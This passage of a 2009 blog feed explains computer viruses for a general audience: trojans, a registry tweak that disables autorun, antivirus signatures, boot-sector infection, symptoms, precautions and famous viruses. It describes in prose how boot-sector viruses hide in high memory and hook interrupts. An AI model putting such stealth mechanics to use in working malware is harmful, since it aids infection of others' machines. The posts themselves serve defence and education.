href="http://www.anti-trojan.org/"&gt;http://www.anti-trojan.org/&lt;/a&gt;&lt;br /&gt;Gives you more information about trojans and related malicious softwares. The site also gives some anti-trojans for downloading.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://ezinearticles.com/?How-Trojan-Virus-Threats-on-Your-Computer-Can-Put-Your-Financial-Information-at-Risk&amp;amp;id=1585959"&gt;http://ezinearticles.com/?How-Trojan-Virus-Threats-on-Your-Computer-Can-Put-Your-Financial-Information-at-Risk&amp;amp;id=1585959&lt;/a&gt;&lt;br /&gt;This site contain an article about the trojan.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-6722410862901062703?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/6722410862901062703/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/01/beware-of-trojans.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/6722410862901062703'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/6722410862901062703'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/01/beware-of-trojans.html' title='Beware of Trojans'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_mPzqYV2-K04/SYLM0QfU_jI/AAAAAAAAACY/jnoNG0NcJW0/s72-c/trojan-horse.gif' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-2342986989045506741</id><published>2009-01-28T05:07:00.000-08:00</published><updated>2009-01-28T05:11:17.771-08:00</updated><title type='text'>Disable Autoruns in XP and Vista</title><content type='html'>You may know that most of the computer viruses infects the computer through the pen drives is due to the autorun. There are several softwares available in the market that can disable or kill the autoruns. Some anti viruses block the autoruns if the drive is infected. We can disable autoruns in XP and vista in a very easy way.You will take only a little time to disable autoruns in XP and Vista.&lt;br /&gt;   There are several methods available for disabling the autoruns. One method which works in both XP and Vista is given below.&lt;br /&gt;&lt;br /&gt;Open a notepad and type the following:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;REGEDIT4&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IniFileMapping\Autorun.inf]&lt;br /&gt;@="@SYS:DoesNotExist"&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Save the notepad with '.reg' extension(eg:atrun.reg). While saving make sure that the type of file is set to 'All Files'.&lt;br /&gt;Navigate to the saved location and open the file. Windows will display a message asking you wether you want to add these data to the registry. Click 'Yes'.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-2342986989045506741?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/2342986989045506741/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/01/disable-autoruns-in-xp-and-vista.html#comment-form' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/2342986989045506741'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/2342986989045506741'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/01/disable-autoruns-in-xp-and-vista.html' title='Disable Autoruns in XP and Vista'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-1090212942331723809</id><published>2009-01-23T06:35:00.002-08:00</published><updated>2009-01-23T06:43:11.845-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Vaccine'/><category scheme='http://www.blogger.com/atom/ns#' term='Stone Virus'/><category scheme='http://www.blogger.com/atom/ns#' term='Anti-Virus'/><category scheme='http://www.blogger.com/atom/ns#' term='Curing'/><title type='text'>Vaccine For Virus</title><content type='html'>&lt;meta equiv="CONTENT-TYPE" content="text/html; charset=utf-8"&gt;&lt;title&gt;&lt;/title&gt;&lt;meta name="GENERATOR" content="OpenOffice.org 3.0  (Win32)"&gt;&lt;style type="text/css"&gt; 	&lt;!-- 		@page { margin: 0.79in } 		P { margin-bottom: 0.08in } 	--&gt; 	&lt;/style&gt; &lt;p style="margin-bottom: 0in;"&gt;                      Now let us look into how to cure the viruses. We have a problem here is that we do not have a generalized solution. We have to deal with different viruses in different manner. This made the task tougher. But there is no other option.  &lt;/p&gt; &lt;p style="margin-bottom: 0in;"&gt;                       The first thing we have to know is the type of virus. The next thing we have to know is the working of the virus. The working of the virus can be studied by carefully examining the virus program. Now there are several decompilers and simulators are available for this purpose.&lt;/p&gt; &lt;p style="margin-bottom: 0in;"&gt;                        Now let us start with Bootstrap viruses. Suppose a Bootstrap virus copies the contents of the location side 0, track 0 and sector 1 to a location side 0, track 0 and sector 7 (this is in the case of Stone virus).&lt;/p&gt; &lt;p style="margin-bottom: 0in;"&gt;                         In this case, we know the location where the virus will copy the original program. So the solution is simple. Boot from a non-infected disk and copy the contents of the location side 0,track 0 and sector 7 to the normal location of  side 0, track 0 and sector 1. In the case of the partition table infected by the virus, we can copy-paste or cut-paste the original boot programs to its correct location. But whatever you do to remove the virus from the hard disk or from the floppy, the entire work will be futile as long as the virus is active in the memory. One of the solution is to boot from a safe disk. Most of the anti-virus program try to delete the virus from the memory. Some will end in success while others request for a reboot to kill the virus before booting. If you Avast anti virus you may notice that sometimes the anti-virus shows a message for scheduling a boot scan informing that the virus is active in memory. However the above mentioned era has been gone.&lt;/p&gt; &lt;p style="margin-bottom: 0in;"&gt;                           Now we have to deal with advanced viruses. The file  viruses are one among them. In the case of file viruses, it attach itself to a file. This is done in different methods. One is to reduce the base address of the file by the size of the virus and get copied to the present memory location of the file. In this case our job become tougher. One solution is to continuously monitoring the size of the file. But this solution would fall when we edit that file or when copy a file from a infected disk. Here there is another effective solution. Each virus has its own signature. Signature is a unique set of codes for each type of virus. By reading the contents of the memory location of the file we are able to check for the virus. If the virus signature is present, we can easily detect the viruses, only provided we should know the codes in the virus signature. This can be done simply by writing a program for reading from the memory and comparing the content of the memory with virus code. If all the code match with any of the part in the file memory, then we can cure the file by reading the file contents only and deleting the virus code. In the extreme case we have to delete the whole file.  &lt;/p&gt; &lt;p style="margin-bottom: 0in;"&gt;                            Most of the anti-virus has two parts- a database and a program. The database contains the virus signatures and the program compares for a match in the file code and the virus codes. If any of the mismatch occur in the codes occur then the program will leave the entire block since there is no chance for the virus infection. This is the reason why most of the anti-virus requires updates. The updating will enable by adding the virus signatures of the newly found viruses to the anti-virus database and the the anti-virus program is modified for detecting the new viruses according to there method of infection.  &lt;/p&gt; &lt;p style="margin-bottom: 0in;"&gt;                             So for protecting your PC from the attack of the viruses you have to install an updated anti-virus software and update it whenever it is required. Care should be taken in selecting the anti-virus. Before selecting the anti-virus you must make sure that the anti-virus detects latest viruses and updates are available from time to time.&lt;/p&gt; &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-1090212942331723809?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/1090212942331723809/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/01/vaccine-for-virus.html#comment-form' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/1090212942331723809'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/1090212942331723809'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/01/vaccine-for-virus.html' title='Vaccine For Virus'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-7008399532622495913</id><published>2009-01-20T23:40:00.000-08:00</published><updated>2009-01-21T00:34:40.451-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Booting from infected disk'/><title type='text'>Booting From An Infected Disk</title><content type='html'>I for got to put a post on how the booting from an infected floppy disk or drive affects the computer. Now let us look into it. A infected disk means it contains potentially harmful files such as viruses or Trojans. If it is a bootable disk the virus may be in the boot sector of the disk which is a very dangerous condition. In the case of hard disks the virus may be in the partition table or boot sector or in both location. The virus in the infected boot disk ensures the original content of the boot sector are copied to a safe location so that it will not be lost easily.&lt;br /&gt;Now let us checkout how the booting from an infected disk affects the computer. Before entering into this topic one must know about the &lt;a href="http://creatingcomputervirus.blogspot.com/search/label/Booting"&gt;booting procedure&lt;/a&gt;. (I have already put a post on &lt;a href="http://creatingcomputervirus.blogspot.com/search/label/Booting"&gt;booting&lt;/a&gt; from a non-infected disk. Click &lt;a href="http://creatingcomputervirus.blogspot.com/search/label/Booting"&gt;here&lt;/a&gt; to refer it.) It will be helpful if you refer it.&lt;br /&gt;The various stages of the booting from infected disk is given below:&lt;br /&gt;a)POST routines are executed.&lt;br /&gt;b)Set up the Interrupt Service Routine Table (IVT).&lt;br /&gt;c)The size of the RAM is calculated during the RAM test and the size is stored in the location 0x413 and 0x414.&lt;br /&gt;d)Standard equipments are initialized.&lt;br /&gt;e)Non standard equipments are initialized.&lt;br /&gt;f)Reading the boot up sequence.&lt;br /&gt;g)The contents in the boot sector are loaded into the main memory and the control is passed to the program in the main memory. In the infected disk virus will be loaded in to the main memory and the control is passed to the virus in the main memory.&lt;br /&gt;h)Virus gets loaded in a memory where a bootstrap program gets loaded. The virus cannot load the file IO.SYS. So virus has to load Disk Bootstrap Program in to the memory. This Disk Bootstrap Program is loaded in the place where the virus is loaded. As a result the virus will be overwritten. Thus the virus in the memory is destroyed. But the virus maker is too tricky and he will not let it to do so. The virus is programmed to load a copy of itself in the high end of the memory before loading the Disk Bootstrap Program. The size of the memory will be available at the location 0x413 and 0x414. The virus after loading into the high end of the main memory, it reduces the size of the memory stored in the location 0x413 and 0x414 by its size. After this process the virus will load the Disk Bootstrap Program and the control is passed to it.&lt;br /&gt;i)The remaining part of the booting will occur in the normal way. But the virus will be active in the memory. It can capture interrupts and perform malicious task. It captures the interrupt  for writing into memory and copies itself into the memory whenever the interrupt for memory writing is called. This way by capturing interrupts and being active in the memory the virus is able to spread themselves and perform malicious tasks in the computer. Since these processes does not informs anything to the user, the user feels that everything is OK and the virus will remain undetected. If we try to boot a system with an infected disk, the virus will affect that system also.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-7008399532622495913?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/7008399532622495913/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/01/booting-from-infected-disk.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/7008399532622495913'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/7008399532622495913'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/01/booting-from-infected-disk.html' title='Booting From An Infected Disk'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-3732710682739499803</id><published>2009-01-11T01:49:00.000-08:00</published><updated>2009-01-11T02:20:41.532-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='precautions'/><title type='text'>General precautions </title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www1.istockphoto.com/file_thumbview_approve/3199745/2/istockphoto_3199745_computer_virus.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 184px; height: 148px;" src="http://www1.istockphoto.com/file_thumbview_approve/3199745/2/istockphoto_3199745_computer_virus.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;meta equiv="CONTENT-TYPE" content="text/html; charset=utf-8"&gt;&lt;title&gt;&lt;/title&gt;&lt;meta name="GENERATOR" content="OpenOffice.org 3.0  (Win32)"&gt;&lt;style type="text/css"&gt; 	&lt;!-- 		@page { margin: 0.79in } 		P { margin-bottom: 0.08in } 	--&gt;&lt;/style&gt;It is very hard to keep your computer safe from the attack of the viruses. Today most of the viruses infects the computers through the pen drives and internet. The CDs are also a medium of infection. With the arrival of flash drives the usage of  CDs has been reduced to great extend. So we have to take precautions to reduce the infection. Some steps of avoiding infections are listed below:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Do not connect the flash drives or other memories that you are not sure about the content.&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Use autorun killer softwares to increase&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Install a good anti-virus to defend your system from viruses. It is very important to update the anti-virus periodically. Only the updated anti-virus can detect the new viruses.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Enable firewall which will increase the computer's security.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Shut down the computer in its proper way otherwise, you are helping the virus (if any) for its action.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;The booting increases the chance for spreading of the viruses. So if there is an infection, switch on the system when you are ready to kick off the virus from your system.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Do not share CDs or DVDs burnt using an infected system.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Try to avoid the usage of cracks and patches for the sharewares.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Avoid viewing the restricted sites.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Some sites ask you to download Activex to view the content. Download Activex only from the publisher site.&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.topnews.in/files/computer-virus1.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 342px; height: 252px;" src="http://www.topnews.in/files/computer-virus1.JPG" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;These are only precautions. It does not guaranties that your system will be completely free from viruses. Taking these precautions will only reduce the risk of virus infection for your computer.  &lt;/span&gt;&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-3732710682739499803?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/3732710682739499803/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/01/general-precautions.html#comment-form' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/3732710682739499803'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/3732710682739499803'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/01/general-precautions.html' title='General precautions '/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-46753548135162441</id><published>2009-01-10T22:43:00.001-08:00</published><updated>2009-01-10T23:32:06.656-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Symptoms of virus infection'/><title type='text'>Common Symptoms of Virus Infection</title><content type='html'>It is not possible to protect our system completely from the attack of the viruses. It will enter in to the system by several means. Most of the viruses shows its presence to the user when it has gained almost all the control of the computer.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://alfajiri.files.wordpress.com/2008/02/computer-virus.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 181px; height: 158px;" src="http://alfajiri.files.wordpress.com/2008/02/computer-virus.jpg" alt="" border="0"&gt;&lt;/a&gt;&lt;br /&gt;Since the most commonly used operating system is WINDOWS, the systems running on windows are more subjected to virus attacks. Some of the common symptoms of virus infection are given below:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Disabling of the windows applications like Task Manager, Registry Edit, Folder Options etc. Since these applications point out the user about their existence and can be removed by the user easily with the help of these application. some viruses try to disable these applications.&lt;/li&gt;&lt;li&gt;You may see .exe files having the icon of folder and having the name of the containing folder. The most commonly seen name is new folder. The user being unknown of this virus tries to open it and the virus starts its job. Its working can be stopped by going to the task manager-&gt;processes-&gt;(name of the virus)-&gt;end process. This will stops the virus temporarily, not permanently.&lt;/li&gt;&lt;li&gt;Computer stops or restart responding when try to use certain softwares. This is because the virus may delete some of the files required by the software for its working. This will lead the system to an unknown state or a crash.&lt;/li&gt;&lt;li&gt;When you open certains emails with strange attachments, suddenly dialog boxes appear and your system performance will degrade suddenly.&lt;/li&gt;&lt;li&gt;The presence of the files havind double extension like .gif.exe, .avi.vbs, etc&lt;/li&gt;&lt;li&gt;The uninstalling of the antivirus software or the disabling of the antivirus software.&lt;/li&gt;&lt;li&gt;Strange pop ups and notifications appear alerting you about the system security.&lt;/li&gt;&lt;li&gt;Your friends receving infected mail from you.&lt;/li&gt;&lt;li&gt;Unexpected sounds from the speakers while playing media player. Flickering of the visual display.&lt;/li&gt;&lt;li&gt;Certain applications dissappear from your computer without your knowledge.&lt;/li&gt;&lt;li&gt;Windows will start normally, but becomes not responding while operating.&lt;/li&gt;&lt;li&gt;Windows does not boot displaying messages about the missing files. The files may be deleted by the viruses.&lt;/li&gt;&lt;li&gt;Low memory message displays even though you have plenty of RAM remainig unused.&lt;/li&gt;&lt;li&gt;You system became running at very low speed consuming more memory &lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://directinnovators.com/images/computer_virus_250x251.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 212px; height: 213px;" src="http://directinnovators.com/images/computer_virus_250x251.jpg" alt="" border="0"&gt;&lt;/a&gt;and processor's processing power.&lt;/li&gt;&lt;li&gt;Disappearing of a partition.&lt;/li&gt;&lt;li&gt;Cannot install new programs correctly.&lt;/li&gt;&lt;li&gt;Windows restarts unexpectedly.&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;br /&gt;The above mentioned things need not be a symptiom of virus infection. Some other problems related to both software and hardware also shows some of the above symptoms. So judgement must be done carefully.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-46753548135162441?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/46753548135162441/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/01/common-symptoms-of-virus-infection.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/46753548135162441'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/46753548135162441'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/01/common-symptoms-of-virus-infection.html' title='Common Symptoms of Virus Infection'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-7887925767760236501</id><published>2009-01-09T22:29:00.000-08:00</published><updated>2009-01-10T01:45:41.772-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Sasser'/><category scheme='http://www.blogger.com/atom/ns#' term='Melissa'/><category scheme='http://www.blogger.com/atom/ns#' term='Storm Worm'/><category scheme='http://www.blogger.com/atom/ns#' term='Klez'/><category scheme='http://www.blogger.com/atom/ns#' term='Code Red. Code Red II'/><category scheme='http://www.blogger.com/atom/ns#' term='Leap-A/Oompa-A'/><category scheme='http://www.blogger.com/atom/ns#' term='Nimda'/><category scheme='http://www.blogger.com/atom/ns#' term='MyDoom'/><category scheme='http://www.blogger.com/atom/ns#' term='SQL Slammer/Sapphire'/><category scheme='http://www.blogger.com/atom/ns#' term='ILOVEYOU'/><category scheme='http://www.blogger.com/atom/ns#' term='Netsky'/><title type='text'>Top 10 Notorious Viruses</title><content type='html'>&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_mPzqYV2-K04/SWhLQz5HA1I/AAAAAAAAABI/5h8Q8ptGJMw/s1600-h/computer-virus-picturejpg.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 228px; height: 171px;" src="http://1.bp.blogspot.com/_mPzqYV2-K04/SWhLQz5HA1I/AAAAAAAAABI/5h8Q8ptGJMw/s320/computer-virus-picturejpg.jpg" alt="" id="BLOGGER_PHOTO_ID_5289560514526380882" border="0"&gt;&lt;/a&gt;When the internet and other services are becoming more and more sophisticated, some people misuse their knowledge for the creation of evil things like viruses. Some of them created viruses for their fame. Here are a list of 10 viruses that causes destruction world wide.&lt;br /&gt;&lt;font style="font-weight: bold;"&gt;&lt;br /&gt;&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;ol&gt;&lt;li&gt;&lt;font style="font-weight: bold;"&gt;Melissa&lt;/font&gt;&lt;/li&gt;&lt;/ol&gt;Melissa was one of the first computer viruses to get the public's attention. It was invented in 1999 by David L. Smith. He named the virus 'Melissa' named after an exotic dancer from Florida. Melissa was a macro viruses which spread through e-mails. the Melissa computer virus tempts recipients into opening&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_mPzqYV2-K04/SWhFBSioHpI/AAAAAAAAAAo/nrGvyyv2SBk/s1600-h/melissa.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 200px; height: 232px;" src="http://4.bp.blogspot.com/_mPzqYV2-K04/SWhFBSioHpI/AAAAAAAAAAo/nrGvyyv2SBk/s320/melissa.jpg" alt="" id="BLOGGER_PHOTO_ID_5289553650805907090" border="0"&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_mPzqYV2-K04/SWhFBYGXJFI/AAAAAAAAAAg/Z6XD3YI4IvU/s1600-h/_736505_smith_150.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 150px; height: 180px;" src="http://3.bp.blogspot.com/_mPzqYV2-K04/SWhFBYGXJFI/AAAAAAAAAAg/Z6XD3YI4IvU/s320/_736505_smith_150.jpg" alt="" id="BLOGGER_PHOTO_ID_5289553652297966674" border="0"&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: center; font-weight: bold; font-style: italic;"&gt;David L. Smith who is the creator of the virus Melissa&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_mPzqYV2-K04/SWhFBtYVGrI/AAAAAAAAAA4/_fWC4mbMyhg/s1600-h/melissa+Screenshot.gif"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 262px;" src="http://2.bp.blogspot.com/_mPzqYV2-K04/SWhFBtYVGrI/AAAAAAAAAA4/_fWC4mbMyhg/s320/melissa+Screenshot.gif" alt="" id="BLOGGER_PHOTO_ID_5289553658010475186" border="0"&gt;&lt;/a&gt;&lt;br /&gt;&lt;font style="font-weight: bold; font-style: italic;"&gt;A Sreen Shot of Melissa&lt;/font&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;According to FBI, Melissa awoke  interest in the part of government. Since the traffic of e-mail increased and due to the spreading of this virus, some companies have stopped their e-mail programs till the virus was brought to control. The Smith was sentenced with 20 month jail and he was fined with $5,000. He was also forbidden from using the computer networks without the proper authorization. Later Melissa virus was brought to control.&lt;br /&gt;&lt;br /&gt;                                                                   &lt;br /&gt;                                                                                                                                                                       2.&lt;font style="font-weight: bold;"&gt; ILOVEYOU&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;One year after the invention of Melissa a new virus originated in Philippines. It is the ILOVEYOU virus. It is a worm that infected several computers. The worms are capable of infecting several computers independent of the operating system in the computer. They have the capability of self replication. Like Melissa virus this worm also spread through e-mail. The message of the email is that it was a love letter from a admirer. The attachment of the e-mail is the virus file with the name LOVE-LETTER-FOR-YOU.TXT.vbs. The .vbs in name stands for the language used by hacker to create the virus (Visual Basic Scripting).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_mPzqYV2-K04/SWhFBrnKSNI/AAAAAAAAABA/Qg2Dc4wTWbA/s1600-h/iloveyou.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 208px;" src="http://3.bp.blogspot.com/_mPzqYV2-K04/SWhFBrnKSNI/AAAAAAAAABA/Qg2Dc4wTWbA/s320/iloveyou.jpg" alt="" id="BLOGGER_PHOTO_ID_5289553657535809746" border="0"&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center; font-weight: bold; font-style: italic;"&gt;Screen shot of the ILOVEYOU virus&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;ILOVEYOU virus had a wide range of attacks: It replicates several times and hide the copies in several folders in the victims computer. It added new values to the victim's computers registry keys. It placed several files with its copy in the victim's computer. It send its copy to several other computers through chats and e-mails. It downloaded a file called WIN-BUGSFIX.EXE from the Internet and executed it. This program was a password-stealing application that e-mailed secret information to the hacker's e-mail address. Some think it was Onel de Guzman of the Philippines created the ILOVEYOU virus. Filipino authorities investigated de Guzman on charges of theft -- at the time the Philippines had no computer espionage or sabotage laws. Citing a lack of evidence, the Filipino authorities dropped the charges against de Guzman, who would neither confirm nor deny his responsibility for the virus. According to some estimates, the ILOVEYOU virus caused $10 billion in damage.&lt;br /&gt;&lt;br /&gt;&lt;title&gt;&lt;/title&gt;&lt;meta name="GENERATOR" content="OpenOffice.org 3.0  (Win32)"&gt;&lt;style type="text/css"&gt; 	&lt;!-- 		@page { margin: 0.79in } 		P { margin-bottom: 0.08in } 	--&gt; 	&lt;/style&gt; &lt;font size="3"&gt;3.&lt;font style="font-weight: bold;"&gt;The Klez Virus&lt;/font&gt;&lt;/font&gt;&lt;meta equiv="CONTENT-TYPE" content="text/html; charset=utf-8"&gt;&lt;title&gt;&lt;/title&gt;&lt;meta name="GENERATOR" content="OpenOffice.org 3.0  (Win32)"&gt;&lt;style type="text/css"&gt; 	&lt;!-- 		@page { margin: 0.79in } 		P { margin-bottom: 0.08in } 		A:link { so-language: zxx } 	--&gt; 	&lt;/style&gt; &lt;p style="margin-bottom: 0in;" 